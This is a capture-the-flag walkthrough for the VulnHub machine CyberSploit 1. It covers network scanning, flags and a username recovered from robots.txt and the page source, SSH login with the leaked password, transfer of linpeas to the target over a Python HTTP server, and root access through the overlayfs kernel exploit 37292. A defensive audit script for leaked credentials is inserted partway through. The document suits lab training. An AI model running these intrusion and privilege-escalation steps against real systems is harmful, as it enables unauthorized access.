https://www.vulnhub.com/entry/cybersploit-1,506/
It's running Ubuntu 12.04 LTS, so use that preset in QEMU
Discover Target IP
sudo nmap -sn 192.168.122.1-255
Scan Ports
nmap -p- 192.168.122.181
nmap -p 22,80 -sC -sV 192.168.122.181
sudo nmap -sU 192.168.122.181  # scans the top 1000 UDP ports
Port 80
- visit http://192.168.122.181/robots.txt
- getting
R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9
- decoding it from base64 gives Flag 1:
Good Work !
Flag1: cybersploit{youtube.com/c/cybersploit}
dirb http://192.168.122.181
nikto -host 192.168.122.181
- if we inspect element (view-source:http://192.168.122.181/) of the home page, we will get a username at line 48:
<!-------------username:itsskv--------------------->
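Seen from the defender's side, both leaks on port 80 (an account name in an HTML comment and a base64 string in robots.txt) can be caught by a content audit before the site is published. The script below is an added example, not part of the original walkthrough; the function names and the keyword list are assumptions, and the sample inputs are constructed from the values shown above.

```python
import base64
import binascii
import re

# Keywords that suggest a comment carries account data (assumed list, extend as needed).
KEYWORDS = ("user", "pass", "pwd", "login", "key", "token", "secret")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
HTML_COMMENT = re.compile(r"<!--(.*?)-->", re.DOTALL)


def decode_if_text(token):
    """Return the decoded text if token is base64 of printable ASCII, else None."""
    if len(token) % 4:
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    ok = all(c.isprintable() or c in "\r\n\t" for c in text)
    return text if ok else None


def audit(name, body):
    """Return (file, kind, detail) findings for one piece of served content."""
    findings = []
    for m in HTML_COMMENT.finditer(body):
        comment = m.group(1).strip("- \t\r\n")  # drop decorative dashes
        if any(k in comment.lower() for k in KEYWORDS):
            findings.append((name, "comment", comment))
    for m in B64_TOKEN.finditer(body):
        text = decode_if_text(m.group(0))
        if text is not None:  # readable text hidden behind an encoding
            findings.append((name, "base64", text))
    return findings


# Constructed samples, built from the values shown in this walkthrough.
SAMPLES = {
    "robots.txt": "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9\n",
    "index.html": "<html><body>\n<!-------------username:itsskv--------------------->\n</body></html>\n",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        for finding in audit(name, body):
            print(finding)
```

Any hit from a check like this is worth treating as a disclosed credential, since on this machine the decoded robots.txt value is also the SSH password.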
Port 22
- we can now use ssh itsskv@192.168.122.181, with the password cybersploit{youtube.com/c/cybersploit} from flag one, to log in to the target machine
- get flag2.txt from itsskv's home, convert it from binary to text and get Flag 2:
good work !
flag2: cybersploit{https:t.me/cybersploit1}
Explore Privilege Escalation Possibilities
- LinPeas.sh: https://github.com/carlospolop/PEASS-ng
- we can try
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
but it won't work, as the target machine doesn't have SSL
- so we download it onto the attacker's machine and start a simple server using Python at port 4444:
python3 -m http.server 4444
- after SSH into the target machine, fetch it from the attacker's machine (replace <attacker-ip> with its address):
wget http://<attacker-ip>:4444/linpeas.sh
chmod +x linpeas.sh
and then run it
Kernel Exploit - Privilege Escalation
- Because the kernel version is 3.13.0, which is quite old, we can search for exploits online
- or
searchsploit linux kernel 3.13.0
overlayfs Local privilege escalation
https://www.exploit-db.com/exploits/37292
- We are going to use the 37292 exploit
- Download it from the website
- or use
searchsploit -m 37292.c
to mirror it to our current working directory
- compile it using
gcc 37292.c -o 37292
or
make 37292
- just run it on the target machine, now we are root
Getting the Flag
- run bash to get a better shell
cat /root/finalflag.txt